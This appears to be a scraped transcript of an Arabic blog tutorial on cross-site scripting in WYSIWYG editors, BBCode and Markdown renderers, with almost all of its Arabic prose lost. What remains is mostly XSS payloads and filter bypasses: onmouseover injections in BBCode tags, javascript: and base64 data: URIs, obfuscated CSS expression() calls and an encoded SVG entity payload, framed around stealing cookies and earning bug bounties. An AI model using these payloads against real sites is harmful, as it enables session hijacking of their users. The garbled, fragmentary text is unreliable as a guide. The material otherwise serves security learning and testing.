h4cksc4n.files.wordpress.com · Web viewهنا من على CKEditor لموقع ebay .
Transcript of h4cksc4n.files.wordpress.com · Web viewهنا من على CKEditor لموقع ebay .
( XSS )
XSS Vulnerable In web appliaction
XSS XSS XSS cross-site scripting vulnerabilities MALWARE
XSS XSS
:
1. wysiwyg
2. Magento Commerce Bug
3. WYSIWYG
4. WYSIWYG
5. ( Attack Vector #1 )
6. ( Attack Vector #2 )
7. Attribute Context
8. URL Context
9. Twitter Translation's
10. Style Context
11. WYSIWYG
12. XSS
13.
14. Data URL
15.
WYSIWYG
What You See Is What You Get
: WYSIWYG
1)
2)
3)
4)
5)
6)
7) .....
XSS WYSIWYG Enterprise TinyMCE Editlive Lithium Jive TinyMCE PHP HTML Editor markUp FreeTextBox Froala Editor Eirte CKEditor ...
WYSIWYG Magento Commer XSS 1000 $ http://magento.com/security
2051362 334227 448284 http://www.magentocommerce.com/boards/
Bold [b] html 4 [color=blue] [size=4]
[b][size=4][color=blue]bold[/size][/color][/b]
HTML
bold
bold Preview
document.cookie Removed
[removed] XSS
code Igniters CI_Security PHP XSS document.cookie Removed
code Igniters
GitHub PHP . CodeIgniter 264038
[b][size=4][color=blue]bold[/size][/color][/b]
[b/onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]
And/or
[b onmouseover=alert(1)][size=4][color=blue]bold[/size][/color][/b]
" [b/onmouseover=alert(1)]"
bold
" [b onmouseover=alert(1)]"
bold
HTML URL URI JAVASCRIPT DATA URI
[url=http://www.bbcnews.com]Top Stories[/url]
[url=javascript:alert(1)]Top Stories[/url]
DATA URI
[url=data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+]Top Stories[/url]
URL
alert(1)]Top Stories
Top Stories
URL http:// https:// absolute URL Relative URL CodeIgniter "Removed" http: DATA URL
JAVA EXPRESSION
[b][size=4][color=blue]bold[/size][/color][/b]
EXPRESSION
[b][size=4][color=width:expression(alert(1))]bold[/size][/color][/b]
alert(1))]bold
""Removed
[b][size=4][color=blue]bold[/size][/color][/b]
[b][size=4][color=width:expre/**/ssion(alert(1))]bold[/size][/color][/b]
bold
CodeIgniter expre ssion Removed codeIgniter's black-listed Style .
Color Style HTML Color
[b][size=4][color=blue]bold[/size][/color][/b]
[b][style=width:expre/**/ssion(alert(1))]bold [/style] [/b]
bold
style class Style Context style
[b][style=style=width:expre/**/ssion(alert(1))]bold[/style][/b]]
bold
class style Class
[b][style="style=width:expre/**/ssion(alert(1))]bold[/style][/b]]
bold
bold
IE7 eventHandler
[b][style="onmouseover="alert(cookie);]bold[/style][/b]
cookie document.cookie CodeIgniter ""removed document.cookie cookie xss
https://support.mozilla.org/en-US/kb/cookies-information-websites-store-on-your-computer
PHPSESSIONID HTTPONLY SECURE vBulletin 2014 ubuntu forums Apple Developers forums
md5 www-data vBulletin
https://www.youtube.com/watch?v=blDzqctIU2E
https://www.youtube.com/watch?v=TYcP3FbK3X4
xss wordpress 3.x
https://www.youtube.com/watch?v=7K15yzSeIGo
Content Management Systems(CMS) Drupal WordPress Magento JetSpeed ....
WYSIWYG :-
:
URL
ID , CLASS
WYSIWYG
( Attack Vector #1 ) :
http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg
http://xssplayground.net23.net/xss"onmouseover="alert(1); imagefile.svg
xss img
URL Decoder Explicit Server Side Decoding Decoder " "
http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg?"onmouseover="alert(1)
URL
! !
!Image URL Goes Here!
decoder " encode
Store XSS
Store XSS reflacted XSS Store xss kindle direct Publishing (break context)
( Attack Vector #2 ) :
URL IMG A Data:image SVG XML
data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=
svg jpg png Torjan_horse.jpg
http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)
http://xssplayground.net23.net/xss%22onmouseover=%22alert(1);%20imagefile.svg
Alt id class ALT
Jive
img :
firefox 33.0
Attribute Context
( )
// Context Name Attribute
// Context Value Attribute
JAVASCRIPT URL
xhtml XHTML alt , class , id , src,
IE8
Github
Online
URL Context
URL
LOCATION Action XSS CSRF SSRF
:
:
URI javascript
URL Javascript
(with encoding (Obfuscation i encoding URL HTML5 enitity Encoding Hex Encoding decimal Encoding
Data URI
Data-Base64 URL URL Base64 URI data is hidden 100
Vbscript
onmouseover=alert(1)
FreeTextBox WYSIWYG Asp.net
FreeTextBox
PHP HTML Hp Liberal.ca PHP JQUERY Joomla , Dojo Joomla Dojo Editor html Asp.net Asp Cute Cute 10000 60 XSS 10000
Web Wiz EditLive https://www.webwiz.co.uk/companyinfo/
customer-testimonials.htm
MarkitUp
http://ephox.com/customers
Twitter Translation's
https://twitter.com/ - automatic!
[Tiwtter](https://twitter.com/)
[] Tiwtter () URL
[Tiwtter](javascript:alert(1))
Data URI vb script uri encoding html
[twitter](javascript:alert(1))
Amp enitity html encoding URL encoding
[Tiwtter](javascript:alert%281%29)
3rd party libraries WYSIWYG MarkDown
http://daringfireball.net/projects/markdow
n/dingus
Style Context
CSS style style html html xml xslt
Online
()
:
URI ie Expression Css
hex encoding encoding decimal html encoding ie
\ xss
CKEditor ebay
tinyMCE Expression Expr/**/ession ie Expression
URL DATA URI
data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+
xss innerHTML
onmouseover=alert(1)
() IE 8 innerHTML :
div layer
click
:
Attacking well-secured web-applications by using innerHTML Mulations: in css 2013
WYSIWYG (Attacking Insert/Edit/Upload File Feature of WYSIWYG)
Drop file name
XSS
IMPERAVI Redactor
http://imperavi.com/redactor/
XSS Froala
Demo(Issue Fixed)
http://jsfiddle.net/7qgt9wrw/3/
HTTPONLY HTTP / HTTPS
PAYPAL
Froala :
javascript:alert(1) data:text/html;base64.PHN2Zy9vbmxvYWQ9YwxIcnQoMik+
http://www.ieee-security.org/images/new-web/Torjan_horse.jpg?onmouseover=alert(1)
image title innerHtml
onmouseover=alert(1)
WYSIWYG (Attacking Insert video Feature of Wysiwyg Editors)
Object embed onmouseover
Youtube Froala Raptor
....
object , embed HTML
XSS
xss
framework
... xss
XSS
HttpOnly flag
pluggin
HttpOnly AJAX
HttpOnly document.cookie Dom Property AJAX
AJAX ( GET POST )
AJAX AJAX HttpOnly
https://www.isecur1ty.org/%D8%B4%D8%B1%D8%AD-%D8%AB%D8%BA%D8%B1%D8%A7%D8%AA-blind-xss
XSS DOM
https://www.security4arabs.com/2014/01/12/dombased-xss-vulnerabilities
flag Secure
https sidehijacking session id cookie http https Secure CPU
XSS 1000$
http://demo.chmsoftware.com/7fc785c6bd26b49d7a7698a7518a73ed/
81570 catch all
:
1
str_replace $bad_chars $safe_chars $input $bad_chars $input $safe_chars " ' , encoding html string
encoding encoding :
http://jsfiddle.net/9t8UM/3/
divlayer
Hard coded double quotes in order to break the attribute contex
divlayer
Decimal Encoded Double Quotes
divlayer
Hex Encoded Double Quotes
divlayer
URL Encoded Double Quotes
divlayer
HTML5 Encoded Double Quotes
divlayer
Unicode Encoded Double Quotes
divlayer
Encoding decoding Encoding Explicit Server Side Decoding
2 :
Style
" '
ie
\\ \\
< style
:
Injection here
alert(1)
: ;
3 :
URL Context
http https ftp : // " , ' \
http://jsfiddle.net/hfot8ruq/
pipeline
This is normal text - and this is bold text.
This is normal text - and this is bold text.
Output Reflects Here:
Filter has catch your awesome vector ... Try hard :(
data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz4gCjwhRE9DVFlQRSBodG1sIFsgCjwhRU5USVRZIHhzcyAiJiM2MDtzY3JpcHQmIzYyO2NvbmZpcm0obG9jYXRpb24pJiM2MDsvc2NyaXB0JiM2MjsiPiAKXT4gCjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4gCjxoZWFkPiAKPHRpdGxlPlhNTCBYU1MgVmVjdG9yPC90aXRsZT4gCjwvaGVhZD4gCjxib2R5PiAKJnhzczsgCjwvYm9keT4gCjwvaHRtbD4=
.
Data URL
http https Content-type binary html xml YAML Content-type mime/type Characher set charset=UTF-8 ascii code non-ascii code
URL Data
data:[][;base64],
mediatype mime/type text/plain;charset=US-ASCII URL encoding Hex encoding svg svg
data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'%3E%3Cpath d='M224%20387.814V512L32 320l192-192v126.912C447.375 260.152 437.794 103.016 380.93 0 521.287 151.707 491.48 394.785 224 387.814z'/%3E%3C/svg%3E
SVG
svg11.dtd
URL Encoding
%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E
base64 Encoding
PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+
DATA URL
data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCA1MTIgNTEyIj48cGF0aCBkPSJNMjI0IDM4Ny44MTRWNTEyTDMyIDMyMGwxOTItMTkydjEyNi45MTJDNDQ3LjM3NSAyNjAuMTUyIDQzNy43OTQgMTAzLjAxNiAzODAuOTMgMCA1MjEuMjg3IDE1MS43MDcgNDkxLjQ4IDM5NC43ODUgMjI0IDM4Ny44MTR6Ii8+PC9zdmc+
URL Encoding
data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20viewBox%3D%220%200%20512%20512%22%3E%3Cpath%20d%3D%22M224%20387.814V512L32%20320l192-192v126.912C447.375%20260.152%20437.794%20103.016%20380.93%200%20521.287%20151.707%20491.48%20394.785%20224%20387.814z%22%2F%3E%3C%2Fsvg%3E
svg xml
xml cloud office
XML xml JSON javascript object notation data type encoding
xml
Xml Markup xhtml Markup markup html
XML SpagoBI () .... XML talned , ! XML
XML XHTML XSL SVG :
Common DOCTYPE Declarations
https://www.w3.org/QA/2002/04/valid-dtd-list.html
Base 64 Encoding
1-10 10 20 base 10 1-10 base 16 09 , AF base 64 AZ, az,and 09 +, / ascii code
base 64 binary audio Json string java script object notation
base 64 decoding spamming anit-spamming
Json base 64 encoding Json base 64
( base 64 encoding Image ) png jpg svg data URL Base64 base64_encode()
confirm(1);
// set element onclick event handler
window.onload=function () {
var square = document.getElementById("square");
// onclick event handler, change circle radius
square.onclick = function() {
var color = this.getAttribute("fill");
if (color == "#ff0000") {
this.setAttribute("fill", "#0000ff");
} else {
this.setAttribute("fill","#ff0000");
}
}
}
]]>
svg CDATA enitity xhtml
Accessing Inline SVG
// set element onclick event handler
window.onload=function () {
var square = document.getElementById("square");
// onclick event handler, change circle radius
square.onclick = function() {
var color = this.getAttribute("fill");
if (color == "#ff0000") {
this.setAttribute("fill","#0000ff");
} else {
this.setAttribute("fill","#ff0000");
}
}
}
]]>
SVG
if (document.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image", "1.1")) {
document.documentElement.className = "svg";
}
img { width: 18.75em; height: 6.25em; }
img.svg { display: none; }
img.png { display: inline; }
html.svg img.svg { display: inline; }
html.svg img.png { display: none; }
svg
http://voormedia.com/blog/2012/10/displaying-and-detecting-support-for-svg-images
Svg html 5 SVG
http://edutechwiki.unige.ch/en/Using_SVG_with_HTML5_tutorial#Embeding_SVG_in_HTML_5_with_the_object_tag
https://www.owasp.org/images/0/03/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf
https://h4cksc4n.wordpress.com